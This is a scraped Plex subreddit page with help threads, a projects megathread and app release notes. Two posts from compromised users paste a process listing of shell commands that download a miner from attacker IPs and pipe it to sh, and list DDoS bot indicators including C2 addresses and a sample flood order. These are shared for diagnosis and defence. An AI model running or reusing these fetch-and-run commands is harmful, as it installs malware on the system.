All build help questions must be posted in this thread.

Welcome to the weekly build help thread! This is the place to ask for advice, recommendations, and help with your Plex server builds and setups.

What to Post Here

  • Build advice requests - "What hardware should I use for transcoding 4K?"
  • Hardware recommendations - "Best CPU for a Plex server under $500?"
  • Component compatibility - "Will this GPU work with my motherboard?"
  • Hardware upgrades - "Should I upgrade my CPU or add more RAM?"
  • Build planning - "Planning a new server, what specs do I need?"
  • Hardware comparisons - "Intel vs AMD for Plex transcoding?"

Before Posting

Please include relevant details such as:

  • Your budget
  • Current hardware (if upgrading)
  • Number of expected concurrent streams

[LabB0T] Monthly Projects Megathread — October 2026

10 Upvotes

Monthly Projects Megathread — October 2026

There has been an influx of people wanting to share their projects and we have recently decided to disallow such posts on the subreddit as the vast majority of it is vibe coded slop, however, we continue to be inundated with these requests, and some of these are somewhat legit, so here we are.

This thread is for people to share 'their' projects, apps, scripts or anything else Plex related.

You may only post your project here once per month, and you may only post one project.

Rules

  1. Declare AI use - if you used AI or AI assistance (ChatGPT, Copilot, Cursor, Claude, etc.) at any point during development, you must state this clearly, as per the template below. Failure to disclose will result in removal and a ban from the subreddit.
  2. Be detailed - vague "I made a thing, here's a link" posts will be removed. Tell us what it does, why you built it, how it works, and any relevant technical details.
  3. Include all relevant links - GitHub/source, documentation, releases, demo videos, screenshots, etc. If it's closed source, explain why.
  4. It must be Plex related - tools, scripts, apps, integrations, configs, hardware setups, anything directly tied to your Plex experience.

Tips for a Good Post

  • Describe the problem you were solving, not just what you built
  • Include screenshots, config snippets, or a short demo if possible
  • Share what worked, what didn't, and what you'd do differently
  • Mention the tech stack / language / dependencies
  • If it's a script or tool, show a sample of the output or usage

Example Post Format

``` Project: [Name] — [one-line description]
What it does: A few sentences describing what the project does and the problem it solves.
AI Disclosure: If you used AI, explain how you used it, and how much AI was used, where, what tools etc.
If you did not use AI, state this clearly.
Technical Overview: Brief technical overview - language, how it integrates with Plex, any dependencies, etc.
Help Aware that Plex was hacked, but not sure if I was affected
80 Upvotes
Was running on windows, a version before the recent fixes. I had neglected updating for some time because I'm a relatively new user and did not see the updates come in or the auto-update function. Everything has since been updated. My question is whether I have been affected, or if I even can be affected? My server is only available locally, I do not pay for remote access and the settings for that have always been turned off. It is only on my local network. If I could be affected, how would I check on windows?
Apologies for the inexperienced questions.
News Plexamp v4.50.20-beta.29 Released
10 Upvotes
Plexamp v4.50.20-beta.29
This one rolls up the last few betas. Desktop is on the beta channel now, Android is in Play testing, and iOS is in TestFlight.
Added
  • The experimental Chromecast receiver is now available to everyone: Settings › Remote Control › Use Experimental Receiver, then restart Plexamp.
  • Caldera players’ settings can take a file, so you can import an AutoEQ profile as an EQ preset or upload a room-correction filter (needs a Caldera beta that isn’t out yet).
Fixed
  • Switching libraries from CarPlay or Android Auto works again.
  • CarPlay: no more crash or freeze when playback starts just as it connects, such as from a Shortcut.
  • CarPlay: shuffling an album opened from the Home screen plays it instead of loading forever.
  • Fixed a crash while another device is fetching a file from Plexamp.
  • Visualizers should line up better with what you hear, including over Bluetooth and AirPlay.
  • A section’s › sits beside its title instead of at the far edge.
  • Compilations are listed by title, with the full A-Z bar.
  • Rows in sorted library lists are evenly spaced.
  • An artist’s Similar Artists rows follow the page’s Grid or List setting.
  • Windows: fixed a crash at launch for some people.
  • macOS: keys work as soon as the window opens, without a click first.
  • Linux: the cursor no longer gets stuck as a resize arrow.
  • Desktop: album pages sit on the cover’s own colors, and an artist’s background art spans the top of the page without flickering.
  • Desktop: the sidebar meets the player bar without a seam, and arrowing left lands on the right row.
Help My plex got hacked and they embedded a miner, couple of questions
180 Upvotes
I don't need help with fixing the issue, I'm trying to figure out how they embedded it and how it triggers. So far I've figured out that they must have configured the media scanner to start their process. See the below snippet, you can see the media scanner PID is 24194 which is spawned from the default plex application from the systemd service configuration. Then all the sh commands come from that. So, my main question is, where can I find how the media scanner is configured? Something in it's configuration is creating these shell commands to try and pull down their miner.
plex 2248 1 0 08:36 ? 00:01:42 /usr/lib/plexmediaserver/Plex Media Server plex 24194 2248 0 11:37 ? 00:00:00 /usr/lib/plexmediaserver/Plex Media Scanner --match --type 8 --log-file-suffix Matcher --files @/tmp/4073-be72-5139-d6fd.txt --match-tag-mode=all plex 24197 24194 0 11:37 ? 00:00:00 /bin/sh -c wget http://217.60.194.116/plex -O-|sh plex 24198 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/plex -O- || curl http://217.60.194.116/plex -o-)|sh plex 24199 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/x -O- || curl http://217.60.194.116/x -o-)|sh plex 24200 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://77.90.185.205/m/sh -O- || curl http://77.90.185.205/m/sh -o-)|sh
I have already blocked outbound network traffic to those 2 IP, and one of them is a known bot farm according to some quick searching.
Help Plex on AppleTV no longer able to play HDR content
8 Upvotes
It looks like it happened overnight for me - watched a movie yesterday.
Today the same movie goes into endless buffering.
AppleTV 3rd gen.
tvOS 27.0
Client version 2026.20.0(2099)
Plex Server v1.43.4.10903
I have apps auto-update on in my AppleTV.
The server is running the latest version and I haven't touched it for a while
Is this caused by AppleTV Plex app update - can't find when my Plex app was updated exactly but it looks line a new version was release 6 days ago.
Any fix advice?
Thanks.
Help Reading about the Plex hack - a question for a light user.
32 Upvotes
As someone who only really uses Plex in the most basic of ways - having it open on my laptop so I can watch downloaded stuff on my PS5 on my local network - I'm not in any danger, right? The issue has to do with actual plex servers and whatnot?
I just want to be clear since everyone is talking about servers and all that.
Help Live TV (from HDHomerun tuner) starts stutter/buffering about about an hour
2 Upvotes
Scenario: I'm watching live TV (from HDHomerun tuner) and things are great until it later starts stutter/buffering after about an hour of having watched live TV. For example, I sit down to watch a TV show that is airing live -- sporting events a big example -- from local broadcasters, using a good over-the-air antenna that delivers a very strong signal. It show nicely, looks great and sounds great until right around an hour later. At that point the circle of death starts, buffering and stuttering. It tries to pick up but lasts only about 5 - 10 seconds before it repeats over and over again.
Back out of the app entirely, restart the app and go back to live TV again and it shows great again.
Plex is current, running from Unraid docker.
Note that I can use Jellyfin to watch and don't have the issue at all. Watching recorded content or content from my library of content doesn't have any issue. It's just live TV coming from the HDHomerun tuner(s)
Discussion Another Plex2Shell hit, mine was a DDoS bot
227 Upvotes
There's already been a post about old Plex servers getting popped by Plex2Shell (miner + proxy). Mine got hit too, but it dropped a DDoS bot instead, so adding the details.
Internet kept dropping Sunday night/monday morning. Plex was being told to flood other people and maxed out our upload every time.
I was on 1.43.0. I run staged updates, get ntfy alerts for new images, and Plex was deliberately held. In May 1.43.1 broke direct play on our Samsung Frame, Plex acknowledged the bug, so I pinned VERSION= to the last good build with a weekly reminder to retest. The reminder only checked whether the Samsung bug was fixed. It never flagged that 1.43.3 was a security fix, so the hold kept me on a vulnerable version.
If you hold back any app for a bug, make sure security releases still get your attention.
FYI:
- in from 94.154.43.88 on 32400, then called back to it on 8952
- /tmp/.pxb (its own curl/wget), /tmp/.px_7c1e
- bot at /tmp/.spid (self-deletes, shows as "cron"), copy at /var/tmp/kworker + kworker.sh
- C2 176.65.149.82:48101, backup hand.genddos.st
- plain text orders like `!ATK 179 udpplain 80 <ip> 53 len=1400`
- sha256 a654ffc9ea1d3af1cb07feeefe8ee078a0faaaf60b31aa20cfbe082d6c22696c
Look for a Plex child process called "cron", junk in /tmp or /var/tmp in the container, or TranscoderH264Options in Preferences.xml that's present but empty. The hunt script at github.com/code-zm/plex2shell is worth running.
Fixed with 1.43.4, a container rebuild and blocking the IPs. Change your Plex password too, it steals the owner token.
Help Featurette playlist
Post image
4 Upvotes
I created a playlist consisting of the featurettes of all the Lord of the Rings films so that I can watch them back to back. The Plex app doesn't seem to like that, however, and I keep getting an error.
I have other playlists that work just fine, and playing each featurette individually also works fine.
Server and app up to date with latest versions.
Help Apple TV + HomePods lagging issue
0 Upvotes
Hi I have started to use plex to stream my 4k Blu rays at home through Apple TV and sound through pair of HomePods OG
Unfortunately when I’m playing a movie it starts lagging and stuttering. The issue stops when I channel the audio through the LG tv speakers.
I have tried multiple audio tracks but with no success. I don’t have the option to use the old player or use old audio settings as AI suggests, the option simply is not available. Tried also Infuse and it works without stutter on HomePods however I don’t like the video quality and it’s paid. Do you have any suggestions for a solution
Help Unable to access my local Plex Library with my phone/smart TV
0 Upvotes
Since last night I have tried to watch Plex with my Sony Bravia TV (X85J) or my phone (Android 16) and despite I can log in my Plex account I cannot see my local library (the server is set in a ASUSTOR NAS). The server is updated tto the lastest update available which was released on August 17th.
I can only access to my media through a PC.
I have reset the router, the TV, logged out and in the account, checked over and over again that I'm connected to the same network as my NAS and... nothing. I didn't have any issue yesterday's afternoon, I also don't have enabled the remote access to the server.
Any advice?
Help Dossiers photos non identifiés sur app Plex sur TV .
0 Upvotes
Bonjour, mon ancienne app Plex sur une TV LG de 5 ans identifiaient et lisaient parfaitement les dossiers photos aussi.
Pas de problème sur ma tablette Samsung et mon Smartphone POCO par le biais de Plex Photos.
Ma toute nouvelle TV Xiaomi a une app Plex qui reconnait les films, séries ,musiques mais pas les dossiers photos.
Peut on espérer le retour d'une version unique qui intègre tout ?
Help Plex not seeing all folders - any way to manually 'override'?
0 Upvotes
So, my Plex is being... annoying. It occasionally will not see a folder within a directory, sometimes even if it is seeing other files and folders within it.
Main current example: I have one folder for a TV show, with three folders in it, one for each season. Plex is only seeing two of them though (1 and 3, even more annoyingly!) All the episodes are named in the same format (Title S01E01, Title S01E02, etc), the files are all the same media type (MKVs in this case), and yet it will. not. find. that one folder. As I say, this isn't the only place/show it's happening, either.
Any idea why this is happening, or if there's any way to force it to see a particular folder when it isn't picking them up via scanning?
News Caldera Music v1.2.0-beta.3 Released
1 Upvotes
Caldera v1.2.0-beta.3
A beta of every Caldera player:
  • Headless v1.2.0-beta.3
  • Amp v1.2.0-beta.3 (macOS, Windows, Linux)
  • Apple TV v1.2.1 (build 46), TestFlight
  • Google TV v1.2.0 (versionCode 22), Play beta
The Apple TV and Google TV builds reach testers once Apple and Google finish reviewing them.
  • With Match Source, a stereo album on an output Windows has set up as 5.1 or 7.1 plays gaplessly again instead of going briefly silent at every track change. (Headless, Amp)
  • Plexamp’s settings for a player show Room Correction’s on/off switch only once a filter has been uploaded, instead of showing it on with nothing to apply. (Headless, Amp, Google TV)
  • Plexamp’s settings for a Linux player no longer offer Exclusive Audio, which does nothing there. (Headless, Amp)
  • Album art, artist photos and backgrounds load from Plex servers on Let’s Encrypt’s new certificates, instead of staying blank while music played fine. (Google TV)
Help Making a throwback Christmas channel with my library
13 Upvotes
I was hoping someone could point me in the right direction on this, I want to make a throwback Christmas channel to use after Halloween. I was hoping to have some old 80s/90s/2000s christmas commercials and Christmas episodes/movies going.
What is the easiest way to do this? I have seen a lot of apps on here that emulate tv but I am not sure which one fits best. I don't really care to have a fancy guide or anything because I am only planning on setting up the one channel for now.
I'd also like to know what the best way to add these to my library would be. I am planning on adding holiday episodes from shows I don't already have in my plex library and I'd prefer to not have them show up in my regular plex app if there is only one episode of the show there. I am running out of storage so this will all be pretty minimal
edit: forgot to mention but I typically stream from the vizio tv app but also use a PS5. I have a firestick and an onn streaming box I can use if their aren't options for the tv or console.
News Caldera Music v1.2.0-beta.2 Released
5 Upvotes
Caldera v1.2.0-beta.2
This beta is mostly about sound. The audio engine that every Caldera player shares gains a set of new tools, set from the apps or from Plexamp’s settings for the player:
  • A Limiter, on by default, that catches peaks without delaying the audio.
  • Room correction from a REW (or similar) filter and AutoEQ headphone profiles, uploaded straight from Plexamp’s settings. Correction adds no delay, so grouped rooms stay in step.
  • Headphone crossfeed, and dither for 16- and 24-bit DACs.
The latest beta of Plexamp can also now show visualizers for music playing on another Caldera player, in time with what that room hears.
A beta of every Caldera player:
  • Headless v1.2.0-beta.2
  • Amp v1.2.0-beta.2 (macOS, Windows, Linux)
  • Apple TV v1.2.1 (build 45), TestFlight
  • Google TV v1.2.0 (versionCode 21), Play beta
The Apple TV and Google TV builds reach testers once Apple and Google finish reviewing them.
New
  • A Limiter setting, on by default, keeps loud passages from clipping when EQ, crossfeed or room correction push them past full scale, without delaying the audio or touching anything quieter.
  • Loudness Leveling gains a Preamp setting (0 to +6 dB, +4 by default), as in Plexamp.
  • Room correction: a filter from a measurement tool such as REW, loaded from Caldera Amp’s settings or uploaded through Plexamp’s settings for the player (or caldera-music --set-file on a headless player), corrects that room’s speakers with no added delay, so grouped rooms stay in step.
  • AutoEQ headphone profiles: a ParametricEQ.txt imported in Caldera Amp’s settings or uploaded through Plexamp’s becomes an EQ preset and is applied, and saved presets can be chosen from an EQ Preset setting in every app.
  • A Headphone Crossfeed setting (Mild, Medium or Strong) blends a little of each channel into the other ear, so hard-panned stereo stops sounding like it is inside your head.
  • Music played through a 16- or 24-bit DAC is dithered, so quiet passages and fade-outs keep their detail instead of turning gritty; a Dither setting turns it off. (Headless, Amp)
  • The disk cache can be turned Off (cache.diskLimitBytes=off): music streams with nothing written to disk, and Sweet Fades shorten to fit what RAM holds. (Headless)
  • New cache.memoryBufferBytes setting limits how much RAM each playing track may use (default 20 MB). (Headless)
  • New log.toFile setting turns off the log files in the config directory, for players that already log to the system journal. (Headless)
  • Plexamp can show visualizers for music playing on another player, in time with what that room hears.
  • A Release Device When Group Paused setting lets rooms in a group keep the audio device while the group is paused. (Headless, Amp)
Fixed
  • Loudness leveling now matches Plexamp: tracks Plex has analysed play at the same level as in Plexamp instead of about 4 dB quieter, and quiet recordings are no longer turned up.
  • Music played through a 16-bit DAC no longer crackles when EQ pushes a loud passage past full scale, and untouched 16- and 24-bit music reaches a DAC of the same depth unchanged. (Headless, Amp)
  • A player on a computer that also runs Plexamp or another Plex app shows its own track and state to the group, instead of the other app’s.
  • Fixed a rare stall where music went silent partway through a track and stayed silent until skipped.
  • Fixed an occasional crash shortly after changing the audio output device.
  • With a small disk cache limit, a track too big to fit plays without being written to disk, instead of filling the disk past the limit.
  • The disk cache limit holds while music downloads, instead of only being enforced after each track finishes.
  • The disk cache limit takes any size from 32 MB up, such as 64MB or 256000000, instead of resetting sizes not in its list to 512 MB. It is now cache.diskLimitBytes; the old name still works. (Headless)
  • Fixed an occasional crash when the player shuts down. (Headless, Amp)
  • Playing or resuming after handing the audio device to another service takes it back, instead of showing as playing in silence. (Headless)
  • Restarting no longer grabs the audio device for a paused session; it waits until you press play. (Headless)
  • A play that waited on a busy audio device and was paused now asks your integration hook again next time, instead of timing out. (Headless)
  • Music a managed user plays from Plexamp now shows up in their own play history instead of the owner’s.
  • Playback no longer stops dead at a short track (about a minute or less) with the progress stuck at 0:00.
  • Every room in a paused group lets go of the audio device after the idle timeout, like a paused player on its own, so AirPlay or another service on the same device can play, and comes back in step when the group plays again. (Headless)
  • A group’s audio gets priority on Wi-Fi networks that support it, so a busy download on the same network is less likely to make a room stall or slip out of step.
  • Log times on a device without a clock battery, such as a Raspberry Pi, match the real time instead of lagging by however far the clock was off at startup. (Headless, Amp)
  • Plexamp’s settings for a headless player no longer list the device hooks and busy-device wait meant for platform integrators, and setting them on the device with caldera-music --set takes effect while it runs instead of being lost. (Headless)
  • Seeking in a long DSD track is instant, and seeking back no longer plays garbled sound until the next seek.
  • A room that loses its connection for a moment snaps back in step with the group, instead of drifting and echoing against it for up to half a minute.
  • Caldera Amp’s media cache stays within the size shown in Settings, instead of growing without limit until that setting was changed. (Amp)
  • Plexamp’s settings for this player show the values it is actually using, such as its sample rate, and a change made in either Plexamp or the app shows up in the other. (Amp, Apple TV, Google TV)
  • The Library’s Recently Added, and every other sort, picks up new music when you come back to it or to the app, instead of only after a force stop. (Apple TV, Google TV)
Help Plex 2026.20.0 on Apple TV – black screen on DV + HDR10+ files, plain HDR10 still works
15 Upvotes
Anyone else getting this since the latest update?
Since 2026.20.0 landed on my Apple TV, I can't play any of my DV files anymore. Hit play, server starts sending data (I can see the network activity), but the screen just stays black. Nothing shows up in the Dashboard either, which is weird.
Plain HDR10 files play fine, same settings, no issue at all. It's only the files that have DV profile 8.1 + HDR10 + HDR10+ all in one. Example of one that fails: HEVC Main 10, 2160p 23.976, DV 8.1 (RPU, no EL), HDR10+ present, AC3 5.1. The one that works is a 3840x1608 HDR10-only file with EAC3.
My TV is a Samsung, so no Dolby Vision support, it should just fall back to HDR10 like it always did before this update. Not sure yet if it's the DV or the HDR10+ part that's breaking it, I don't have a file with only one of the two to test.
Stuff I already tried:
- Turning Match Dynamic Range off: still black
- Forcing a transcode: can't really, the quality menu only goes down to 1080p now, which kind of defeats the point for 4K HDR
Setup in case it matters: PMS 1.43.3.10896 in Docker on Debian, Apple TV 4K gen3 on tvOS 27.0, output set to 4K HDR10 50Hz, match dynamic range and frame rate both on.
Is this a known bug in 2026.20.0 or is it just me? Any workaround apart from switching to Infuse?
Help Plex and Arrs - new to this
• Upvotes
So... interesting issue for me. I was wondering if anyone else faced this:
The background:
I have a pretty large library of movies I've collected over the years in Plex. I have a lifetime plex pass as well. Running this on my current synology DS423+ NAS (it's been moved from one nas to another a few times now). In my movie library I have "All Movies", where every movies is initially copied. I have *multiple* libraries based on the film type (i.e. Action Movies, Fantasy Movies, etc.) and then I manually make a hard link to the movie in the All library into each other library it may belong in. As in, if a movie is both fantasy and sci fi, I make hard links in each library to the original in All movies. So in reality I only have one actual copy of the movie, but it shows up in multiple libraries.
This all requires a fair amount of manual work (pretty much all of it). Just this week I decided to start playing with all the Arrs and quickly setup a quick Ubuntu server VM and fired them all up on it. It's really working nice, but I wondering now if I should collapse my movies into just a single library and let people who use it search for a title. Right now I just have sonarr and radarr move them into a different spot on the nas and I manually move them afterwards, but this can be automatically by sonarr and radarr (which is working fine). I'm sure there is a way to automate this as well with some scripted, etc, but wondering if I want to go down that rabbit hole.
I'm curious if anyone else faced this? or how they manage libraries in Plex. I *know* I spend far too much time manually doing stuff so I'd like to cut that back.
Opinions? Thoughts? Solutions? All welcome
Thanks in advance. Not sure if I should cross post this to and of the Arrs subreddits or not??
Help Help with artwork errors
3 Upvotes
My Plex app was updated on my Shield, and now some background art seems to be broken in the "continue watching" section. Some of the shows on my continue watching shelf display the incorrect background art (the default art) rather than my carefully selected art, but when viewing the show in the TV library the artwork is the correct one I chose.
Anyone know how to fix this? I've tried refreshing metadata and rebooting etc. Also have tried using the Plezy app post-Plex-update, and I like it but not enough to switch.
Thanks!
  • Player: Changing the sleep timer duration could still stop playback at the earlier time.
  • Scheduling a recording from the live TV guide reloaded the whole guide.
  • [Android TV][Fire TV][tvOS] Changing a Plex Home user’s Live TV & DVR access closed the restrictions menu before the change could be saved.
  • [Android TV][Fire TV][tvOS] Details pages for over-the-air shows showed empty episode placeholders and nothing was focused.
  • [Android TV][Fire TV][tvOS] Details pages opened while browsing without an account focus the action bar again.
  • [Android TV][Fire TV][tvOS] Opening a filter like Genre now focuses the selected value, or the first one, straight away instead of flickering the highlight.
  • [Android TV][Fire TV][tvOS] Pressing down from an activity card now focuses its first button instead of the More button.
  • [Android TV][Fire TV][tvOS] The radio button on the highlighted option in privacy settings was hidden.
  • [Android TV][tvOS][Fire TV] Focus would move incorrectly on servers in the all libraries list.
  • [Android TV][tvOS][Fire TV] Live TV guide rows could reload and lose focus after closing a menu or while scrolling.
  • [Android][iOS] The music video icon on a track could overlap the track’s duration.
  • [Android][iOS][Android TV][tvOS][Fire TV] The jump bar showed only dots for albums sorted by Album Artist and for TV seasons and episodes sorted by Show.
